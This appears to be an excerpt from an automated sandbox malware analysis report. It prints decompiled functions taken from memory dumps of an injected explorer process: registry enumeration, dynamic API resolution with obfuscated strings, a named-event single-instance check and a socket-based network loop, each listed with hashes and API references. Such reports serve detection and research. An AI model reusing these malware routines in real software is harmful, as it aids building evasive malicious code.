Similarity

API ID:
String ID: WQL
API String ID: 0-1249411209
Opcode ID: 5da0ac7c8c71686d40346969800d5669dd6324656be4193925634263c35a5ac7
Instruction ID: 6012be58926f2fcda362c7b6147d61601e98c6bedea6c2dadd780accd904878f
Opcode Fuzzy Hash: 5da0ac7c8c71686d40346969800d5669dd6324656be4193925634263c35a5ac7
Instruction Fuzzy Hash: 7231C975A00209EFDB14DF94C885FAFB7B5FF49314F208548EA15AB394D774AA81CBA0

Uniqueness

Uniqueness Score: 100.00%

Function 0151D320, Relevance: 10.7, APIs: 7, Instructions: 182
registryCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E0151D320(void* _a4, short* _a8, WCHAR* _a12) {
				char _v5;
				int _v12;
				int _v16;
				int _v20;
				void* _v24;
				char* _v28;
				int _v32;
				int _v36;
				int* _v40;
				void _v562;
				short _v564;
				int _v568;
				short* _v572;
				long _v576;
				int* _v580;
				struct _FILETIME _v588;
				int _v592;
				int _v596;
				short _t58;
				short* _t60;
				char* _t61;
				long _t63;
				long _t80;
				void* _t116;
				void* _t117;
				void* _t118;
				void* _t119;

				_v580 = 0;
				_v24 = 0;
				_t58 =  *0x152a6e0; // 0x0
				_v564 = _t58;
				_t88 =  &_v562;
				memset( &_v562, 0, 0x206);
				_t117 = _t116 + 0xc;
				_v32 = 0x104;
				_v40 = 0;
				_v568 = 0x3fff;
				_v12 = 0;
				_v5 = 0;
				while(0 != 0) {
				}
				_t60 = E01513960(_t88, 0x3fff); // executed
				_t118 = _t117 + 4;
				_v572 = _t60;
				if(_v572 != 0) {
					_t61 = E01513960(_t88, 0x800);
					_t119 = _t118 + 4;
					_v28 = _t61;
					if(_v28 != 0) {
						_t63 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v24); // executed
						_v576 = _t63;
						if(_v576 == 0) {
							while(0 != 0) {
							}
							_v576 = RegQueryInfoKeyW(_v24,  &_v564,  &_v32, 0, 0, 0, 0,  &_v596,  &_v592,  &_v36,  &_v16,  &_v588);
							if(_v576 == 0) {
								if(_v596 == 0) {
									L35:
									while(0 != 0) {
									}
									L37:
									if(_v24 != 0) {
										RegCloseKey(_v24); // executed
									}
									E01513990( &_v572, 0x3fff); // executed
									E01513990( &_v28, 0x800); // executed
									while(0 != 0) {
									}
									return _v580;
								}
								_v20 = 0;
								_v576 = 0;
								while(_v20 < _v596) {
									E01513BA0(_v28, _v28, 0, 0x800);
									E01513BA0(_v28, _v572, 0, 0x3fff);
									_t119 = _t119 + 0x18;
									_v568 = 0x3fff;
									_v12 = 0x800;
									 *_v572 = 0;
									_t80 = RegEnumValueW(_v24, _v20, _v572,  &_v568, 0, 0, _v28,  &_v12); // executed
									_v576 = _t80;
									if(_v576 != 0) {
										while(0 != 0) {
										}
										L23:
										_v20 = 1 + _v20;
										continue;
									}
									if(StrStrIW(_v28, _a12) == 0) {
										goto L23;
									}
									while(0 != 0) {
									}
									_v580 = 1;
									goto L35;
								}
								goto L35;
							}
							while(0 != 0) {
							}
							RegCloseKey(_v24);
							goto L37;
						}
						while(0 != 0) {
						}
						goto L37;
					}
					while(0 != 0) {
					}
					return 0;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x0151d329
0x0151d333
0x0151d33a
0x0151d340
0x0151d34e
0x0151d355
0x0151d35a
0x0151d35d
0x0151d364
0x0151d36b
0x0151d375
0x0151d37c
0x0151d380
0x0151d384
0x0151d38b
0x0151d390
0x0151d393
0x0151d3a0
0x0151d3b4
0x0151d3b9
0x0151d3bc
0x0151d3c3
0x0151d3e5
0x0151d3eb
0x0151d3f8
0x0151d405
0x0151d409
0x0151d445
0x0151d452
0x0151d470
0x00000000
0x0151d553
0x0151d557
0x0151d559
0x0151d55d
0x0151d563
0x0151d563
0x0151d575
0x0151d586
0x0151d58e
0x0151d592
0x00000000
0x0151d594
0x0151d476
0x0151d47d
0x0151d492
0x0151d4ac
0x0151d4c2
0x0151d4c7
0x0151d4ca
0x0151d4d4
0x0151d4e3
0x0151d508
0x0151d50e
0x0151d51b
0x0151d543
0x0151d547
0x0151d489
0x0151d48f
0x00000000
0x0151d48f
0x0151d52d
0x00000000
0x0151d54e
0x0151d52f
0x0151d533
0x0151d535
0x00000000
0x0151d535
0x00000000
0x0151d492
0x0151d454
0x0151d458
0x0151d45e
0x00000000
0x0151d45e
0x0151d3fa
0x0151d3fe
0x00000000
0x0151d400
0x0151d3c5
0x0151d3c9
0x00000000
0x0151d3cb
0x0151d3a2
0x0151d3a6
0x00000000

APIs

memset.MSVCRT(?,00000000,00000206), ref: 0151D355

Part of subcall function 01513960: HeapAlloc.KERNEL32(018E0000,00000008,0152C2F8,?,?,01513A10,015150C5,?,?,015150C6,0152C2F8,00000839), ref: 01513971

RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0151D3E5
RegQueryInfoKeyW.ADVAPI32(00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 0151D43F
RegCloseKey.ADVAPI32(00000000), ref: 0151D45E
RegEnumValueW.ADVAPI32(00000000,00000000,00000000,00003FFF,00000000,00000000,00000000,00000800), ref: 0151D508
StrStrIW.SHLWAPI(00000000,00000000), ref: 0151D525
RegCloseKey.ADVAPI32(00000000), ref: 0151D563

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Close$AllocEnumHeapInfoOpenQueryValuememset
String ID:
API String ID: 2288512575-0
Opcode ID: 3e3f33ef096edd4da5696c8e67de5953167bb0fa810a17029f3daad4acf7cc09
Instruction ID: 94c67abbf0f209341bd7f6ee84b73f05fb7f68454f1e9bfb1af4915be07023ff
Opcode Fuzzy Hash: 3e3f33ef096edd4da5696c8e67de5953167bb0fa810a17029f3daad4acf7cc09
Instruction Fuzzy Hash: AB615F719002199BFB26DFD4DC8DBEEB7B4BB44304F104599E60AAE188E7B85B84CF51

Uniqueness

Uniqueness Score: 10.55%

Function 01516520, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 170
libraryloaderUNIQUE

Download Yara Rule

C-Code - Quality: 73%

			E01516520(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				signed int _v12;
				signed int _v16;
				CHAR* _v20;
				struct HINSTANCE__* _v528;
				intOrPtr _v532;
				signed int _v536;
				CHAR* _v540;
				signed int _v544;
				CHAR* _v548;
				struct HINSTANCE__* _v552;
				CHAR* _v556;
				CHAR* _t95;
				CHAR* _t109;
				CHAR* _t118;
				struct HINSTANCE__* _t119;
				void* _t168;
				void* _t169;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t174;

				_v536 = 0;
				_v16 = 0;
				_v544 = 0;
				_v12 = 0;
				_v540 = E01515350(__ecx, 0x925);
				_t95 = E01515350(__ecx, 0x269c);
				_t171 = _t169 + 8;
				_v20 = _t95;
				_v8 = GetModuleHandleA(_v540);
				if(_v8 != 0) {
					E01515460( &_v540);
					_t172 = _t171 + 4;
					_v532 = 0x925;
					_v528 = _v8;
					_v12 = 1;
					if(_v20 != 0) {
						 *0x153aa40 = GetProcAddress(_v8, _v20);
						E01515460( &_v20);
						_t173 = _t172 + 4;
						_v16 = 0;
						while( *((intOrPtr*)(_a4 + _v16 * 0xc)) != 0) {
							_v552 = 0;
							_v548 = 0;
							_v544 = 0;
							while(_v544 < _v12) {
								if( *((intOrPtr*)(_t168 + _v544 * 8 - 0x210)) !=  *((intOrPtr*)(_a4 + 8 + _v16 * 0xc))) {
									_v544 = _v544 + 1;
									continue;
								}
								_v552 =  *((intOrPtr*)(_t168 + _v544 * 8 - 0x20c));
								break;
							}
							if(_v552 != 0) {
								L24:
								_v556 = 0;
								_t109 = E01515350(_a4,  *((intOrPtr*)(_a4 + 4 + _v16 * 0xc)));
								_t174 = _t173 + 4;
								_v556 = _t109;
								if(_v556 == 0) {
									L30:
									E01515460( &_v548);
									_t173 = _t174 + 4;
									L7:
									_v16 = _v16 + 1;
									continue;
								}
								 *((intOrPtr*)( *((intOrPtr*)(_a4 + _v16 * 0xc)))) = GetProcAddress(_v552, _v556);
								if( *((intOrPtr*)( *((intOrPtr*)(_a4 + _v16 * 0xc)))) != 0) {
									L29:
									E01515460( &_v556);
									_t174 = _t174 + 4;
									goto L30;
								}
								while(0 != 0) {
								}
								_v536 = 0xfffffffe;
								goto L29;
							}
							_t118 = E01515350( *((intOrPtr*)(_a4 + 8 + _v16 * 0xc)),  *((intOrPtr*)(_a4 + 8 + _v16 * 0xc)));
							_t173 = _t173 + 4;
							_v548 = _t118;
							if(_v548 == 0) {
								goto L24;
							}
							_t119 = LoadLibraryA(_v548); // executed
							_v552 = _t119;
							if(_v552 != 0) {
								if(_v12 >= 0x40) {
									_v12 = 0;
								}
								 *((intOrPtr*)(_t168 + _v12 * 8 - 0x210)) =  *((intOrPtr*)(_a4 + 8 + _v16 * 0xc));
								 *(_t168 + _v12 * 8 - 0x20c) = _v552;
								_v12 = _v12 + 1;
								goto L24;
							}
							while(0 != 0) {
							}
							_v536 = 0xfffffffd;
							E01515460( &_v548);
							_t173 = _t173 + 4;
							goto L7;
						}
						return _v536;
					}
					return 0xfffffffe;
				}
				while(0 != 0) {
				}
				return E01515460( &_v540) | 0xffffffff;
			}

0x01516529
0x01516533
0x0151653a
0x01516544
0x01516558
0x01516563
0x01516568
0x0151656b
0x0151657b
0x01516582
0x015165a8
0x015165ad
0x015165b0
0x015165bd
0x015165c3
0x015165ce
0x015165e8
0x015165f1
0x015165f6
0x015165f9
0x0151660b
0x0151661e
0x01516628
0x01516632
0x0151664d
0x01516672
0x01516647
0x00000000
0x01516647
0x01516681
0x00000000
0x01516681
0x01516692
0x0151673c
0x0151673c
0x01516754
0x01516759
0x0151675c
0x01516769
0x015167bd
0x015167c4
0x015167c9
0x01516602
0x01516608
0x00000000
0x01516608
0x0151678b
0x0151679c
0x015167ae
0x015167b5
0x015167ba
0x00000000
0x015167ba
0x0151679e
0x015167a2
0x015167a4
0x00000000
0x015167a4
0x015166a6
0x015166ab
0x015166ae
0x015166bb
0x00000000
0x00000000
0x015166c4
0x015166ca
0x015166d7
0x01516703
0x01516705
0x01516705
0x0151671c
0x0151672c
0x01516739
0x00000000
0x01516739
0x015166d9
0x015166dd
0x015166df
0x015166f0
0x015166f5
0x00000000
0x015166f5
0x00000000
0x015167d1
0x00000000
0x015165d0
0x01516584
0x01516588
0x00000000

APIs

GetModuleHandleA.KERNEL32(?), ref: 01516575
GetProcAddress.KERNEL32(00000000,00000000), ref: 015165E2
LoadLibraryA.KERNEL32(00000000), ref: 015166C4

Strings

%, xrefs: 015165B0
@, xrefs: 015166FF

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID: %$@
API String ID: 310444273-1045240745
Opcode ID: 05314a62a7d1d67abc618044047d40aaea27162b6ea35a7a80d68a523a27b0e8
Instruction ID: 12f237810942e2a502369a015d7af4fc4ab569ec79964484e5e3328904863500
Opcode Fuzzy Hash: 05314a62a7d1d67abc618044047d40aaea27162b6ea35a7a80d68a523a27b0e8
Instruction Fuzzy Hash: 32817DB5D0021DDBEB21DF94D888BADB7B5FB94304F1086E9D4195F288D7B1AA85CF80

Uniqueness

Uniqueness Score: 100.00%

Function 003F7A30, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 170
libraryloaderUNIQUE

Download Yara Rule

C-Code - Quality: 73%

			E003F7A30(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				signed int _v12;
				signed int _v16;
				CHAR* _v20;
				struct HINSTANCE__* _v528;
				intOrPtr _v532;
				signed int _v536;
				CHAR* _v540;
				signed int _v544;
				CHAR* _v548;
				struct HINSTANCE__* _v552;
				CHAR* _v556;
				CHAR* _t95;
				CHAR* _t109;
				CHAR* _t118;
				struct HINSTANCE__* _t119;
				void* _t168;
				void* _t169;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t174;

				_v536 = 0;
				_v16 = 0;
				_v544 = 0;
				_v12 = 0;
				_v540 = E003F8060(__ecx, 0x925);
				_t95 = E003F8060(__ecx, 0x269c);
				_t171 = _t169 + 8;
				_v20 = _t95;
				_v8 = GetModuleHandleA(_v540);
				if(_v8 != 0) {
					E003F8170( &_v540);
					_t172 = _t171 + 4;
					_v532 = 0x925;
					_v528 = _v8;
					_v12 = 1;
					if(_v20 != 0) {
						 *0x4119f0 = GetProcAddress(_v8, _v20);
						E003F8170( &_v20);
						_t173 = _t172 + 4;
						_v16 = 0;
						while( *((intOrPtr*)(_a4 + _v16 * 0xc)) != 0) {
							_v552 = 0;
							_v548 = 0;
							_v544 = 0;
							while(_v544 < _v12) {
								if( *((intOrPtr*)(_t168 + _v544 * 8 - 0x210)) !=  *((intOrPtr*)(_a4 + 8 + _v16 * 0xc))) {
									_v544 = _v544 + 1;
									continue;
								}
								_v552 =  *((intOrPtr*)(_t168 + _v544 * 8 - 0x20c));
								break;
							}
							if(_v552 != 0) {
								L24:
								_v556 = 0;
								_t109 = E003F8060(_a4,  *((intOrPtr*)(_a4 + 4 + _v16 * 0xc)));
								_t174 = _t173 + 4;
								_v556 = _t109;
								if(_v556 == 0) {
									L30:
									E003F8170( &_v548);
									_t173 = _t174 + 4;
									L7:
									_v16 = _v16 + 1;
									continue;
								}
								 *((intOrPtr*)( *((intOrPtr*)(_a4 + _v16 * 0xc)))) = GetProcAddress(_v552, _v556);
								if( *((intOrPtr*)( *((intOrPtr*)(_a4 + _v16 * 0xc)))) != 0) {
									L29:
									E003F8170( &_v556);
									_t174 = _t174 + 4;
									goto L30;
								}
								while(0 != 0) {
								}
								_v536 = 0xfffffffe;
								goto L29;
							}
							_t118 = E003F8060( *((intOrPtr*)(_a4 + 8 + _v16 * 0xc)),  *((intOrPtr*)(_a4 + 8 + _v16 * 0xc)));
							_t173 = _t173 + 4;
							_v548 = _t118;
							if(_v548 == 0) {
								goto L24;
							}
							_t119 = LoadLibraryA(_v548); // executed
							_v552 = _t119;
							if(_v552 != 0) {
								if(_v12 >= 0x40) {
									_v12 = 0;
								}
								 *((intOrPtr*)(_t168 + _v12 * 8 - 0x210)) =  *((intOrPtr*)(_a4 + 8 + _v16 * 0xc));
								 *(_t168 + _v12 * 8 - 0x20c) = _v552;
								_v12 = _v12 + 1;
								goto L24;
							}
							while(0 != 0) {
							}
							_v536 = 0xfffffffd;
							E003F8170( &_v548);
							_t173 = _t173 + 4;
							goto L7;
						}
						return _v536;
					}
					return 0xfffffffe;
				}
				while(0 != 0) {
				}
				return E003F8170( &_v540) | 0xffffffff;
			}

0x003f7a39
0x003f7a43
0x003f7a4a
0x003f7a54
0x003f7a68
0x003f7a73
0x003f7a78
0x003f7a7b
0x003f7a8b
0x003f7a92
0x003f7ab8
0x003f7abd
0x003f7ac0
0x003f7acd
0x003f7ad3
0x003f7ade
0x003f7af8
0x003f7b01
0x003f7b06
0x003f7b09
0x003f7b1b
0x003f7b2e
0x003f7b38
0x003f7b42
0x003f7b5d
0x003f7b82
0x003f7b57
0x00000000
0x003f7b57
0x003f7b91
0x00000000
0x003f7b91
0x003f7ba2
0x003f7c4c
0x003f7c4c
0x003f7c64
0x003f7c69
0x003f7c6c
0x003f7c79
0x003f7ccd
0x003f7cd4
0x003f7cd9
0x003f7b12
0x003f7b18
0x00000000
0x003f7b18
0x003f7c9b
0x003f7cac
0x003f7cbe
0x003f7cc5
0x003f7cca
0x00000000
0x003f7cca
0x003f7cae
0x003f7cb2
0x003f7cb4
0x00000000
0x003f7cb4
0x003f7bb6
0x003f7bbb
0x003f7bbe
0x003f7bcb
0x00000000
0x00000000
0x003f7bd4
0x003f7bda
0x003f7be7
0x003f7c13
0x003f7c15
0x003f7c15
0x003f7c2c
0x003f7c3c
0x003f7c49
0x00000000
0x003f7c49
0x003f7be9
0x003f7bed
0x003f7bef
0x003f7c00
0x003f7c05
0x00000000
0x003f7c05
0x00000000
0x003f7ce1
0x00000000
0x003f7ae0
0x003f7a94
0x003f7a98
0x00000000

APIs

GetModuleHandleA.KERNEL32(?), ref: 003F7A85
GetProcAddress.KERNEL32(00000000,00000000), ref: 003F7AF2
LoadLibraryA.KERNEL32(00000000), ref: 003F7BD4

Strings

%, xrefs: 003F7AC0
@, xrefs: 003F7C0F

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID: %$@
API String ID: 310444273-1045240745
Opcode ID: a02eff55dbe805b12ecbad79296df3aef1a8df9032ef5b7040456fb01903335f
Instruction ID: b7f48b367c6d348463a6379217fd374205b006b74d5d2d69a5f0d741e84e6ae9
Opcode Fuzzy Hash: a02eff55dbe805b12ecbad79296df3aef1a8df9032ef5b7040456fb01903335f
Instruction Fuzzy Hash: BD8149B4D0421DEBCB25DF94D888BADB7B5FB58304F2082A9D519AB291D7349E85CF80

Uniqueness

Uniqueness Score: 100.00%

Function 003F2920, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 100
synchronizationthreadUNIQUE

Download Yara Rule

C-Code - Quality: 56%

			E003F2920(void* __ecx, void* __eflags) {
				long _v8;
				void* _v12;
				CHAR* _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _t24;
				long _t28;
				void* _t30;
				intOrPtr _t40;
				void* _t51;
				void* _t52;

				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_t24 = E003F8FF0(__ecx, __eflags, 4);
				_t52 = _t51 + 4;
				_v28 = _t24;
				_t55 = _v28;
				if(_v28 == 0) {
					while(1) {
						L5:
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_v16 = E003F9B00("jkfkdm");
					__eflags = _v16;
					if(_v16 != 0) {
						_v12 = CreateEventA(0, 0, 0, _v16);
						__eflags = _v12;
						if(_v12 != 0) {
							_t28 = GetLastError();
							__eflags = _t28 - 0xb7;
							if(_t28 != 0xb7) {
								L16:
								_t30 = CreateThread(0, 0, E003F1F20, 0, 0,  &_v24); // executed
								__eflags = _t30;
								if(_t30 != 0) {
									_v8 = WaitForSingleObject(_v12, 0x3a98);
									__eflags = _v8;
									if(_v8 != 0) {
										__eflags = _v8 - 0x102;
										if(_v8 != 0x102) {
											while(1) {
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											L30:
											CloseHandle(_v12); // executed
											return _v20;
										} else {
											goto L25;
										}
										while(1) {
											L25:
											__eflags = 0;
											if(0 == 0) {
												break;
											}
										}
										goto L30;
									} else {
										goto L21;
									}
									while(1) {
										L21:
										__eflags = 0;
										if(0 == 0) {
											break;
										}
									}
									_v20 = 1;
									goto L30;
								} else {
									goto L17;
								}
								while(1) {
									L17:
									__eflags = 0;
									if(0 == 0) {
										break;
									}
								}
								return 0;
							} else {
								goto L14;
							}
							while(1) {
								L14:
								__eflags = 0;
								if(0 == 0) {
									goto L16;
								}
							}
							goto L16;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						return 0;
					}
					return 0;
				}
				_t40 = E003F3CF0(_t55, _v28);
				_t52 = _t52 + 4;
				_v32 = _t40;
				if(_v32 <= 0) {
					goto L5;
				}
				while(0 != 0) {
				}
				return 1;
			}

0x003f2926
0x003f292d
0x003f2934
0x003f293b
0x003f2942
0x003f294b
0x003f2950
0x003f2953
0x003f2956
0x003f295a
0x003f2981
0x003f2981
0x003f2981
0x003f2983
0x00000000
0x00000000
0x003f2985
0x003f2994
0x003f2997
0x003f299b
0x003f29b4
0x003f29b7
0x003f29bb
0x003f29ca
0x003f29d0
0x003f29d5
0x003f29dd
0x003f29ee
0x003f29f4
0x003f29f6
0x003f2a11
0x003f2a14
0x003f2a18
0x003f2a29
0x003f2a30
0x003f2a3a
0x003f2a3a
0x003f2a3c
0x00000000
0x00000000
0x003f2a3e
0x003f2a40
0x003f2a44
0x00000000
0x00000000
0x00000000
0x00000000
0x003f2a32
0x003f2a32
0x003f2a32
0x003f2a34
0x00000000
0x00000000
0x003f2a36
0x00000000
0x00000000
0x00000000
0x00000000
0x003f2a1a
0x003f2a1a
0x003f2a1a
0x003f2a1c
0x00000000
0x00000000
0x003f2a1e
0x003f2a20
0x00000000
0x00000000
0x00000000
0x00000000
0x003f29f8
0x003f29f8
0x003f29f8
0x003f29fa
0x00000000
0x00000000
0x003f29fc
0x00000000
0x00000000
0x00000000
0x00000000
0x003f29d7
0x003f29d7
0x003f29d7
0x003f29d9
0x00000000
0x00000000
0x003f29db
0x00000000
0x00000000
0x00000000
0x00000000
0x003f29bd
0x003f29bd
0x003f29bd
0x003f29bf
0x00000000
0x00000000
0x003f29c1
0x00000000
0x003f29c3
0x00000000
0x003f299d
0x003f2960
0x003f2965
0x003f2968
0x003f296f
0x00000000
0x00000000
0x003f2971
0x003f2975
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 003F29AE
GetLastError.KERNEL32 ref: 003F29CA
CreateThread.KERNEL32(00000000,00000000,Function_00001F20,00000000,00000000,00000000), ref: 003F29EE
WaitForSingleObject.KERNEL32(00000000,00003A98), ref: 003F2A0B
CloseHandle.KERNEL32(00000000), ref: 003F2A44

Strings

jkfkdm, xrefs: 003F2987

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: Create$CloseErrorEventHandleLastObjectSingleThreadWait
String ID: jkfkdm
API String ID: 3117531959-2652042395
Opcode ID: 19b10fdc5b0468e8177a6c14728f5cdff5fa46553f3333c2cdbea669ed497d8d
Instruction ID: 593981efccd22757d728d3db226834aae2924fc905ce750a63d6dc0d234b174d
Opcode Fuzzy Hash: 19b10fdc5b0468e8177a6c14728f5cdff5fa46553f3333c2cdbea669ed497d8d
Instruction Fuzzy Hash: 4B319771D0420EEFEF22DBA0C809BBF7674AB10305F258465DB12A7590DBB54A50DF52

Uniqueness

Uniqueness Score: 100.00%

Function 015022D8, Relevance: 9.2, APIs: 6, Instructions: 198
synchronizationUNIQUE

Download Yara Rule

C-Code - Quality: 70%

			E015022D8(void* __ecx, signed int __edx, void* __fp0) {
				long _v8;
				char _v12;
				long _v16;
				long _v20;
				char _v24;
				char _v28;
				signed int _v32;
				intOrPtr _v292;
				char _v296;
				intOrPtr _v552;
				char _v556;
				char _v816;
				void* __ebx;
				long _t45;
				long _t47;
				long _t52;
				char _t54;
				void* _t55;
				long _t59;
				long _t60;
				long _t65;
				long _t66;
				long _t67;
				signed int _t69;
				long _t70;
				signed int _t71;
				signed int _t72;
				void* _t90;
				signed int _t96;
				long _t99;
				void* _t100;
				void* _t104;
				intOrPtr _t105;
				signed int _t112;
				intOrPtr _t115;
				void* _t117;

				_t117 = __fp0;
				_t96 = __edx;
				_v8 = 1;
				_v16 = 1;
				_v24 = 1;
				_v20 = 0;
				_t105 =  *0x1537910; // 0x0
				if(_t105 != 0) {
					L42:
					return _t45 | 0xffffffff;
				}
				do {
					_t106 = _v8;
					if(_v8 == 0) {
						L10:
						_t47 =  *0x1537904; // 0x1909e28
						if( *((intOrPtr*)(_t47 + 4)) >= 0) {
							L24:
							_v556 = 0;
							_v296 = 0;
							_v816 = 0;
							_v552 =  *((intOrPtr*)(_t47 + 4));
							_v556 = 1;
							__eflags =  *(_t47 + 0x246c);
							if( *(_t47 + 0x246c) > 0) {
								_v292 =  *((intOrPtr*)(_t47 + 4));
								_v296 = 1;
							}
							_v28 =  *((intOrPtr*)(_t47 + 4));
							E015020C0(_t47,  &_v556,  &_v296,  &_v816,  &_v28);
							_t104 = _t104 + 0x14;
							_t52 =  &_v556;
							__imp__#18(0, _t52,  &_v296,  &_v816,  &_v24);
							_t99 = _t52;
							_t45 = WaitForSingleObject( *0x1537900, 0);
							__eflags = _t45;
							if(_t45 == 0) {
								L16:
								_v8 = 1;
							} else {
								__eflags = _t99;
								if(_t99 >= 0) {
									_t59 =  *0x1537904; // 0x1909e28
									_t60 =  *(_t59 + 4);
									__eflags = _t60 - 0xffffffff;
									if(_t60 == 0xffffffff) {
										L35:
										_t45 = E01501FB3( &_v556,  &_v296,  &_v816);
										_t104 = _t104 + 0xc;
										__eflags = _t45;
										if(_t45 >= 0) {
											goto L38;
										}
										L36:
										_t45 = E015016D1( *0x1537904);
										L37:
										_pop(_t86);
										goto L38;
									}
									_t86 =  &_v556;
									_push( &_v556);
									_push(_t60);
									L015216A4();
									__eflags = _t60;
									if(_t60 == 0) {
										L33:
										_push( &_v296);
										_t65 =  *0x1537904; // 0x1909e28
										_push( *((intOrPtr*)(_t65 + 4)));
										L015216A4();
										__eflags = _t65;
										if(_t65 == 0) {
											goto L35;
										}
										_t66 = E01501140( *0x1537904);
										_pop(_t86);
										__eflags = _t66;
										if(_t66 < 0) {
											goto L36;
										}
										goto L35;
									}
									_t67 = E01501496( *0x1537904, E01501A81);
									_pop(_t86);
									__eflags = _t67;
									if(_t67 < 0) {
										goto L36;
									}
									goto L33;
								}
								__imp__#111();
								__eflags = _t45 - 0x2714;
								if(_t45 != 0x2714) {
									L41:
									goto L42;
								}
							}
							goto L38;
						}
						_t100 = E01514080(0);
						_t69 =  *0x1537908; // 0x5dcc4e67
						_v32 = _t96;
						_t86 =  *0x153790c; // 0x0
						_t96 = _t69 | _t86;
						if(_t96 == 0) {
							L17:
							_t70 = E01501D04(_t86, _t96, _t117); // executed
							__eflags = _t70;
							_t47 =  *0x1537904; // 0x1909e28
							if(_t70 >= 0) {
								goto L24;
							}
							_t71 =  *(_t47 + 0x2676);
							__eflags = _t71 - 0x1e;
							if(_t71 > 0x1e) {
								__eflags = _t71 - 6;
								if(_t71 > 6) {
									_t72 = 0x708;
								} else {
									_t72 = _t71 * 0x12c;
								}
							} else {
								_t72 = _t71 * 0x1e;
							}
							asm("adc ecx, [ebp-0x1c]");
							_t45 = E015018B9(_t72 + _t100, 0); // executed
							goto L37;
						}
						_t96 = 0;
						_t112 = _t86;
						if(_t112 < 0 || _t112 <= 0 && _t69 <= _t100) {
							goto L17;
						} else {
							_t45 = WaitForSingleObject( *0x1537900, (_t69 - _t100) * 0x3e8);
							if(_t45 != 0) {
								goto L38;
							}
							goto L16;
						}
					}
					_v12 = E01515350(_t86, 0x1dd7);
					_v8 = 0;
					_t54 = E01515B10(_t86, _t106, 6);
					_t101 = _t54;
					_pop(_t90);
					if(_t54 == 0) {
						_t101 = _v12;
					}
					_t108 = _v16;
					if(_v16 != 0) {
						_v16 = 0;
					} else {
						E015016D1( *0x1537904);
						_pop(_t90);
					}
					 *0x1537908 = 0;
					 *0x153790c = 0; // executed
					_t55 = E01501F21(1, _t90, _t96, _t108, _t117, _t101); // executed
					_push( &_v12);
					if(_t55 < 0) {
						_t45 = E01515460();
						goto L41;
					} else {
						E01515460();
						goto L10;
					}
					L38:
					_v24 = 1;
					_v20 = 0;
					_t115 =  *0x1537910; // 0x0
				} while (_t115 == 0);
				goto L41;
			}

0x015022d8
0x015022d8
0x015022e8
0x015022eb
0x015022ee
0x015022f1
0x015022f4
0x015022fa
0x01502559
0x0150255e
0x0150255e
0x01502301
0x01502301
0x01502304
0x01502363
0x01502363
0x0150236b
0x01502403
0x01502403
0x01502409
0x0150240f
0x01502418
0x0150241e
0x01502424
0x0150242a
0x0150242f
0x01502435
0x01502435
0x0150243e
0x0150245b
0x01502460
0x01502475
0x0150247d
0x0150248a
0x0150248c
0x01502492
0x01502494
0x015023b7
0x015023b7
0x0150249a
0x0150249a
0x0150249c
0x015024b4
0x015024b9
0x015024bc
0x015024bf
0x01502510
0x01502525
0x0150252a
0x0150252d
0x0150252f
0x00000000
0x00000000
0x01502531
0x01502537
0x0150253c
0x0150253c
0x00000000
0x0150253c
0x015024c1
0x015024c7
0x015024c8
0x015024c9
0x015024ce
0x015024d0
0x015024e8
0x015024ee
0x015024ef
0x015024f4
0x015024f7
0x015024fc
0x015024fe
0x00000000
0x00000000
0x01502506
0x0150250b
0x0150250c
0x0150250e
0x00000000
0x00000000
0x00000000
0x0150250e
0x015024dd
0x015024e3
0x015024e4
0x015024e6
0x00000000
0x00000000
0x00000000
0x015024e6
0x0150249e
0x015024a4
0x015024a9
0x01502557
0x00000000
0x01502557
0x015024af
0x00000000
0x01502494
0x01502377
0x01502379
0x0150237e
0x01502382
0x0150238a
0x0150238c
0x015023bf
0x015023bf
0x015023c4
0x015023c6
0x015023cb
0x00000000
0x00000000
0x015023cd
0x015023d3
0x015023d6
0x015023dd
0x015023e0
0x015023ea
0x015023e2
0x015023e2
0x015023e2
0x015023d8
0x015023d8
0x015023d8
0x015023f3
0x015023f8
0x00000000
0x015023fd
0x0150238e
0x01502390
0x01502392
0x00000000
0x0150239a
0x015023a9
0x015023b1
0x00000000
0x00000000
0x00000000
0x015023b1
0x01502392
0x01502312
0x01502315
0x01502318
0x0150231d
0x01502320
0x01502323
0x01502325
0x01502325
0x01502328
0x0150232b
0x0150233b
0x0150232d
0x01502333
0x01502338
0x01502338
0x0150233f
0x01502345
0x0150234b
0x01502356
0x01502357
0x01502551
0x00000000
0x0150235d
0x0150235d
0x00000000
0x01502362
